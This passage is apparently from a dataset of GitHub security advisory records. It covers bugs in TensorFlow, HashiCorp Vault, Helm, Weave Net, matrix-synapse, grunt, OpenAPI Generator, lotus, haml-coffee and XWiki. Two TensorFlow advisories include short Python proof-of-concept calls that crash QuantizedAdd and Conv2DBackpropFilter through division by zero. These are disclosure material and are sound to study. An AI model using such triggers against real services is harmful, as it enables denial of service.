'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-v6r6-84gr-92rm'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29577'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/6fc9141f42f6a72180ecd24021c3e6b36165fe0d'}]","{'cwe_ids': ['CWE-119', 'CWE-787'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-05-18T18:12:31Z', 'nvd_published_at': '2021-05-14T20:15:00Z'}" +1.4.0,GHSA-75pc-qvwc-jf3g,2021-05-13T14:47:09Z,2021-05-18T18:20:48Z,,['CVE-2020-12757'],Improper Input Validation in HashiCorp Vault,HashiCorp Vault and Vault Enterprise 1.4.x before 1.4.2 has Incorrect Access Control.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N/E:U/RL:O/RC:R'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/hashicorp/vault-plugin-secrets-gcp/plugin'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.6.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-12757'}, {'type': 'WEB', 'url': 'https://github.com/hashicorp/vault-plugin-secrets-gcp/pull/85'}, {'type': 'WEB', 'url': 'https://github.com/hashicorp/vault-plugin-secrets-gcp/commit/e43d20870c50f7428dead1411debcec075b35fb4'}, {'type': 'WEB', 'url': 'https://github.com/hashicorp/vault/blob/master/CHANGELOG.md'}, {'type': 'WEB', 'url': 'https://github.com/hashicorp/vault/blob/master/CHANGELOG.md#142-may-21st-2020'}, {'type': 'WEB', 'url': 'https://www.hashicorp.com/blog/category/vault/'}]","{'cwe_ids': ['CWE-20'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-05-13T14:47:09Z', 'nvd_published_at': None}" +1.4.0,GHSA-x83m-p7pv-ch8v,2021-05-18T21:28:55Z,2021-05-21T14:23:38Z,,['CVE-2021-29549'],Division by 0 in `QuantizedAdd`,"### Impact +An attacker can cause a runtime division by zero error and denial of service in `tf.raw_ops.QuantizedAdd`: + +```python +import tensorflow as tf + +x = tf.constant([68, 228], shape=[2, 1], dtype=tf.quint8) +y = tf.constant([], shape=[2, 0], dtype=tf.quint8) + +min_x = tf.constant(10.723421015884028) +max_x = tf.constant(15.19578006631113) +min_y = tf.constant(-5.539003866682977) +max_y = tf.constant(42.18819949559947) + +tf.raw_ops.QuantizedAdd(x=x, y=y, min_x=min_x, max_x=max_x, min_y=min_y, max_y=max_y) +``` + +This is because the [implementation](https://github.com/tensorflow/tensorflow/blob/6f26b3f3418201479c264f2a02000880d8df151c/tensorflow/core/kernels/quantized_add_op.cc#L289-L295) computes a modulo operation without validating that the divisor is not zero. + +```cc +void VectorTensorAddition(const T* vector_data, float min_vector, + float max_vector, int64 vector_num_elements, + const T* tensor_data, float min_tensor, + float max_tensor, int64 tensor_num_elements, + float output_min, float output_max, Toutput* output) { + for (int i = 0; i < tensor_num_elements; ++i) { + const int64 vector_i = i % vector_num_elements; + ... + } +} +``` + +Since `vector_num_elements` is [determined based on input shapes](https://github.com/tensorflow/tensorflow/blob/6f26b3f3418201479c264f2a02000880d8df151c/tensorflow/core/kernels/quantized_add_op.cc#L522-L544), a user can trigger scenarios where this quantity is 0. + +### Patches +We have patched the issue in GitHub commit [744009c9e5cc5d0447f0dc39d055f917e1fd9e16](https://github.com/tensorflow/tensorflow/commit/744009c9e5cc5d0447f0dc39d055f917e1fd9e16). + +The fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in supported range. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported by Yakun Zhang and Ying Wang of Baidu X-Team.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-x83m-p7pv-ch8v'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29549'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/744009c9e5cc5d0447f0dc39d055f917e1fd9e16'}]","{'cwe_ids': ['CWE-369'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-05-18T21:28:55Z', 'nvd_published_at': '2021-05-14T20:15:00Z'}" +1.4.0,GHSA-9vp5-m38w-j776,2021-11-19T15:29:12Z,2021-05-24T16:56:58Z,,['CVE-2020-15184'],Aliases are never checked in helm,"### Impact + +During a security audit of Helm's code base, security researchers at Trail of Bits identified a bug in which the `alias` field on a `Chart.yaml` is not properly sanitized. This could lead to the injection of unwanted information into a chart. + +### Patches + +This issue has been patched in Helm 3.3.2 and 2.16.11 + +### Workarounds + +Manually review the `dependencies` field of any untrusted chart, verifying that the `alias` field is either not used, or (if used) does not contain newlines or path characters.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'helm.sh/helm/v3'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.0.0'}, {'fixed': '3.3.2'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'helm.sh/helm'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.16.11'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'helm.sh/helm/v3/pkg/chartutil'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'fixed': '2.16.11'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'helm.sh/helm/v3/pkg/chartutil'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.0.0'}, {'fixed': '3.3.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/helm/helm/security/advisories/GHSA-9vp5-m38w-j776'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-15184'}, {'type': 'WEB', 'url': 'https://github.com/helm/helm/commit/6aab63765f99050b115f0aec3d6350c85e8da946'}, {'type': 'WEB', 'url': 'https://github.com/helm/helm/commit/e7c281564d8306e1dcf8023d97f972449ad74850'}, {'type': 'PACKAGE', 'url': 'https://github.com/helm/helm'}]","{'cwe_ids': ['CWE-20', 'CWE-74'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-05-24T16:50:04Z', 'nvd_published_at': '2020-09-17T21:15:00Z'}" +1.4.0,GHSA-59qg-grp7-5r73,2021-05-24T21:05:31Z,2021-05-27T19:00:08Z,,['CVE-2020-11091'],Weave Net clusters susceptible to MitM attacks via IPv6 rogue router advertisements,"### Impact +An attacker able to run a process as root in a container is able to respond to DNS requests from the host and thereby insert themselves as a fake service. + +In a cluster with an IPv4 internal network, if IPv6 is not totally disabled on the host (via ipv6.disable=1 on the kernel cmdline), it will be either unconfigured or configured on some interfaces, but it’s pretty likely that ipv6 forwarding is disabled, ie /proc/sys/net/ipv6/conf//forwarding == 0. Also by default, /proc/sys/net/ipv6/conf//accept_ra == 1. The combination of these 2 sysctls means that the host accepts router advertisements and configure the IPv6 stack using them. + +By sending “rogue” router advertisements, an attacker can reconfigure the host to redirect part or all of the IPv6 traffic of the host to the attacker controlled container. +Even if there was no IPv6 traffic before, if the DNS returns A (IPv4) and AAAA (IPv6) records, many HTTP libraries will try to connect via IPv6 first then fallback to IPv4, giving an opportunity to the attacker to respond. +If by chance you also have on the host a vulnerability like last year’s RCE in apt (CVE-2019-3462), you can now escalate to the host. + +### Patches +Weave Net version 2.6.3 (to be released soon) will disable the accept_ra option on the veth devices that it creates. + +### Workarounds +Users should not run containers with CAP_NET_RAW capability. This has been the advice from Weave Net for years. +https://www.weave.works/docs/net/latest/kubernetes/kube-addon/#-securing-the-setup + +### For more information +If you have any questions or comments about this advisory: +* Open an issue in [the Weave Net repo](https://github.com/weaveworks/weave/issues/new) +* Join the Weave Users Slack.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/weaveworks/weave'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.6.3'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/weaveworks/weave/security/advisories/GHSA-59qg-grp7-5r73'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-11091'}, {'type': 'WEB', 'url': 'https://github.com/weaveworks/weave/commit/15f21f1899060f7716c70a8555a084e836f39a60'}]","{'cwe_ids': ['CWE-350'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-05-24T21:05:31Z', 'nvd_published_at': None}" +1.4.0,GHSA-x345-32rc-8h85,2021-08-31T21:04:17Z,2021-05-13T20:22:51Z,,['CVE-2021-29471'],Denial of service attack via push rule patterns in matrix-synapse,"### Impact + +""Push rules"" can specify [conditions](https://matrix.org/docs/spec/client_server/r0.6.1#conditions) under which they will match, including `event_match`, which matches event content against a pattern including wildcards. + +Certain patterns can cause very poor performance in the matching engine, leading to a denial-of-service when processing moderate length events. + +### Patches + +The issue is patched by https://github.com/matrix-org/synapse/commit/03318a766cac9f8b053db2214d9c332a977d226c. + +### Workarounds + +A potential workaround might be to prevent users from making custom push rules, by blocking such requests at a reverse-proxy. + +### For more information + +If you have any questions or comments about this advisory, email us at security@matrix.org.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'matrix-synapse'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.33.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/matrix-org/synapse/security/advisories/GHSA-x345-32rc-8h85'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29471'}, {'type': 'WEB', 'url': 'https://github.com/matrix-org/synapse/commit/03318a766cac9f8b053db2214d9c332a977d226c'}, {'type': 'PACKAGE', 'url': 'https://github.com/matrix-org/synapse'}, {'type': 'WEB', 'url': 'https://github.com/matrix-org/synapse/releases/tag/v1.33.2'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TNNAJOZNMVMXM6AS7RFFKB4QLUJ4IFEY/'}]","{'cwe_ids': ['CWE-331', 'CWE-400'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-05-11T17:19:15Z', 'nvd_published_at': '2021-05-11T15:15:00Z'}" +1.4.0,GHSA-m5pj-vjjf-4m3h,2021-05-04T22:57:23Z,2021-05-06T18:27:18Z,,['CVE-2020-7729'],Arbitrary Code Execution in grunt,The package grunt before 1.3.0 are vulnerable to Arbitrary Code Execution due to the default usage of the function load() instead of its secure replacement safeLoad() of the package js-yaml inside grunt.file.readYAML.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'grunt'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.3.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-7729'}, {'type': 'WEB', 'url': 'https://github.com/gruntjs/grunt/commit/e350cea1724eb3476464561a380fb6a64e61e4e7'}, {'type': 'WEB', 'url': 'https://github.com/gruntjs/grunt/blob/master/lib/grunt/file.js%23L249'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2020/09/msg00008.html'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-607922'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-GRUNT-597546'}, {'type': 'WEB', 'url': 'https://usn.ubuntu.com/4595-1/'}]","{'cwe_ids': ['CWE-1188'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-05-04T22:57:23Z', 'nvd_published_at': '2020-09-03T09:15:00Z'}" +1.4.0,GHSA-cqxr-xf2w-943w,2022-10-25T20:33:52Z,2021-05-11T00:05:06Z,,['CVE-2021-21430'],"Creation of Temporary File in Directory with Insecure Permissions in auto-generated Java, Scala code","### Impact + +**This vulnerability impacts generated code.** If this code was generated as a one-off occasion, not as a part of an automated CI/CD process, this code will remain vulnerable until fixed manually! + +On Unix-Like systems, the system temporary directory is shared between all local users. When files/directories are created, the default `umask` settings for the process are respected. As a result, by default, most processes/apis will create files/directories with the permissions `-rw-r--r--` and `drwxr-xr-x` respectively, unless an API that explicitly sets safe file permissions is used. + +This vulnerability exists due to the use of the JDK method `File.createTempFile`. This method creates an insecure temporary files that can leave application and system data vulnerable to exposure. + +Auto-generated code (Java, Scala) that deals with uploading or downloading binary data through API endpoints will create insecure temporary files during the process. For example, if the API endpoint returns a PDF file, the auto-generated clients will first download the PDF into a insecure temporary file that can be read by anyone on the system. + +Affected generators: + - Java + - `okhttp-gson` (default library) + https://github.com/OpenAPITools/openapi-generator/blob/d85f61ff0cfd6b8cd7063a63f302998a51466269/modules/openapi-generator/src/main/resources/Java/libraries/okhttp-gson/ApiClient.mustache#L1085-L1088 + - `jersey2` + https://github.com/OpenAPITools/openapi-generator/blob/d85f61ff0cfd6b8cd7063a63f302998a51466269/modules/openapi-generator/src/main/resources/Java/libraries/jersey2/ApiClient.mustache#L1035-L1038 + - `resteasy` + https://github.com/OpenAPITools/openapi-generator/blob/d85f61ff0cfd6b8cd7063a63f302998a51466269/modules/openapi-generator/src/main/resources/Java/libraries/resteasy/ApiClient.mustache#L604-L607 + - `retrofit2` + https://github.com/OpenAPITools/openapi-generator/blob/d85f61ff0cfd6b8cd7063a63f302998a51466269/modules/openapi-generator/src/main/resources/Java/libraries/retrofit2/play26/ApiClient.mustache#L202-L208 + - Scala + - `scala-finch` + https://github.com/OpenAPITools/openapi-generator/blob/764a3b044c19fadf4a0789473cde96a65b77868a/modules/openapi-generator/src/main/resources/scala-finch/api.mustache#L83-L88 + - `scala-akka` + https://github.com/OpenAPITools/openapi-generator/blob/150e24dc553a8ea5230ffb938ed3e6020e972faa/modules/openapi-generator/src/main/resources/scala-akka-http-server/multipartDirectives.mustache#L71-L73 + +### Patches + +The issue has been patched by changing the generated code to use the JDK method `Files.createTempFile` and released in the v5.1.0 stable version. + +This vulnerability has the same root cause as CVE-2021-21364 from the `swagger-api/swagger-codegen` project as this project and that one both share the same original source tree. +https://github.com/swagger-api/swagger-codegen/security/advisories/GHSA-hpv8-9rq5-hq7w + +### For more information +If you have any questions or comments about this advisory: +* Open an issue in [OpenAPI Generator Github repo](https://github.com/openAPITools/openapi-generator/) +* Email us at [security@openapitools.org](mailto:security@openapitools.org)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.openapitools:openapi-generator'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '5.1.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/OpenAPITools/openapi-generator/security/advisories/GHSA-cqxr-xf2w-943w'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-21430'}, {'type': 'WEB', 'url': 'https://github.com/OpenAPITools/openapi-generator/pull/8787'}, {'type': 'WEB', 'url': 'https://github.com/OpenAPITools/openapi-generator/pull/8791'}, {'type': 'WEB', 'url': 'https://github.com/OpenAPITools/openapi-generator/pull/9348'}, {'type': 'PACKAGE', 'url': 'https://github.com/OpenAPITools/openapi-generator'}]","{'cwe_ids': ['CWE-269', 'CWE-377', 'CWE-378', 'CWE-379', 'CWE-668'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-05-10T19:25:35Z', 'nvd_published_at': '2021-05-10T20:15:00Z'}" +1.4.0,GHSA-4g52-pqcj-phvh,2021-05-20T20:51:00Z,2021-05-21T16:23:43Z,,['CVE-2021-21405'],"BLS Signature ""Malleability""","### Impact + +1. BLS signature validation in lotus uses blst library method VerifyCompressed. This method accepts signatures in 2 forms - ""serialized"", and ""compressed"", meaning that BLS signatures can be provided as either of 2 unique byte arrays. +2. Lotus block validation functions perform a uniqueness check on provided blocks. Two blocks are considered distinct if the CIDs of their blockheader do not match. The CID method for blockheader includes the BlockSig of the block. + +The result of these issues is that it would be possible to punish miners for valid blocks, as there are two different valid block CIDs available for each block, even though this must be unique. + +### Patches + +By switching from the go based `blst` bindings over to the bindings in `filecoin-ffi`, the code paths now ensure that all signatures are compressed by size and the way they are deserialized. +This happened in https://github.com/filecoin-project/lotus/pull/5393 + + +### References + +- Original POC: https://gist.github.com/wadeAlexC/2490d522e81a796af9efcad1686e6754","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/filecoin-project/lotus'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.5.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/filecoin-project/lotus/security/advisories/GHSA-4g52-pqcj-phvh'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-21405'}, {'type': 'WEB', 'url': 'https://github.com/filecoin-project/lotus/pull/5393'}, {'type': 'WEB', 'url': 'https://gist.github.com/wadeAlexC/2490d522e81a796af9efcad1686e6754'}]","{'cwe_ids': ['CWE-347'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-05-20T20:51:00Z', 'nvd_published_at': '2021-04-15T22:15:00Z'}" +1.4.0,GHSA-j8qc-5fqr-52fp,2021-05-18T22:30:42Z,2021-05-21T14:22:38Z,,['CVE-2021-29538'],Division by zero in `Conv2DBackpropFilter`,"### Impact +An attacker can cause a division by zero to occur in `Conv2DBackpropFilter`: + +```python +import tensorflow as tf + +input_tensor = tf.constant([], shape=[0, 0, 0, 0], dtype=tf.float32) +filter_sizes = tf.constant([0, 0, 0, 0], shape=[4], dtype=tf.int32) +out_backprop = tf.constant([], shape=[0, 0, 0, 0], dtype=tf.float32) + +tf.raw_ops.Conv2DBackpropFilter( + input=input_tensor, + filter_sizes=filter_sizes, + out_backprop=out_backprop, + strides=[1, 1, 1, 1], + use_cudnn_on_gpu=False, + padding='SAME', + explicit_paddings=[], + data_format='NHWC', + dilations=[1, 1, 1, 1] +) +``` + +This is because the [implementation](https://github.com/tensorflow/tensorflow/blob/1b0296c3b8dd9bd948f924aa8cd62f87dbb7c3da/tensorflow/core/kernels/conv_grad_filter_ops.cc#L513-L522) computes a divisor based on user provided data (i.e., the shape of the tensors given as arguments): + +```cc +const size_t size_A = output_image_size * filter_total_size; +const size_t size_B = output_image_size * dims.out_depth; +const size_t size_C = filter_total_size * dims.out_depth; +const size_t work_unit_size = size_A + size_B + size_C; +const size_t shard_size = (target_working_set_size + work_unit_size - 1) / work_unit_size; +``` + +If all shapes are empty then `work_unit_size` is 0. Since there is no check for this case before division, this results in a runtime exception, with potential to be abused for a denial of service. + +### Patches +We have patched the issue in GitHub commit [c570e2ecfc822941335ad48f6e10df4e21f11c96](https://github.com/tensorflow/tensorflow/commit/c570e2ecfc822941335ad48f6e10df4e21f11c96). + +The fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in supported range. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported by Yakun Zhang and Ying Wang of Baidu X-Team.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-j8qc-5fqr-52fp'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29538'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/c570e2ecfc822941335ad48f6e10df4e21f11c96'}]","{'cwe_ids': ['CWE-369'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-05-18T22:30:42Z', 'nvd_published_at': '2021-05-14T20:15:00Z'}" +1.4.0,GHSA-m7mf-vm62-7x3q,2021-05-17T19:07:00Z,2021-05-17T20:58:21Z,,['CVE-2021-32818'],Insecure template handling in haml-coffee,"haml-coffee is a JavaScript templating solution. haml-coffee mixes pure template data with engine configuration options through the Express render API. More specifically, haml-coffee supports overriding a series of HTML helper functions through its configuration options. A vulnerable application that passes user controlled request objects to the haml-coffee template engine may introduce RCE vulnerabilities. Additionally control over the escapeHtml parameter through template configuration pollution ensures that haml-coffee would not sanitize template inputs that may result in reflected Cross Site Scripting attacks against downstream applications. There is currently no fix for these issues as of the publication of this CVE. The latest version of haml-coffee is currently 1.14.1. For complete details refer to the referenced GHSL-2021-025.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'haml-coffee'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.14.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-32818'}, {'type': 'ADVISORY', 'url': 'https://securitylab.github.com/advisories/GHSL-2021-025-haml-coffee/'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/haml-coffee'}]","{'cwe_ids': ['CWE-79'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-05-17T19:07:00Z', 'nvd_published_at': '2021-05-14T19:15:00Z'}" +1.4.0,GHSA-h353-hc43-95vc,2023-09-29T20:11:43Z,2021-05-18T18:36:16Z,,['CVE-2021-32621'],Script injection without script or programming rights through Gadget titles,"### Impact +A user without Script or Programming right is able to execute script requiring privileges by editing gadget titles in the dashboard. + +### Patches +The issue has been patched in XWiki 12.6.7, 12.10.3 and 13.0RC1. + +### Workarounds +There's no easy workaround for this issue, it is recommended to upgrade XWiki. + +### References +https://jira.xwiki.org/browse/XWIKI-17794 + +### For more information +If you have any questions or comments about this advisory: +* Open an issue in [JIRA](https://jira.xwiki.org) +* Email us at [XWiki security mailing-list](mailto:security@xwiki.org) +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.commons:xwiki-commons-core'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '12.6.7'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.commons:xwiki-commons-core'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '12.10.0'}, {'fixed': '12.10.3'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-h353-hc43-95vc'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-32621'}, {'type': 'WEB', 'url': 'https://github.com/xwiki/xwiki-platform/commit/bb7068bd911f91e5511f3cfb03276c7ac81100bc'}, {'type': 'PACKAGE', 'url': 'https://github.com/xwiki/xwiki-platform'}, {'type': 'WEB', 'url': 'https://jay-from-future.github.io/cve/2021/06/17/xwiki-rce-cve.html'}, {'type': 'WEB', 'url': 'https://jira.xwiki.org/browse/XWIKI-17794'}]","{'cwe_ids': ['CWE-94'], 'severity': 'HIGH', 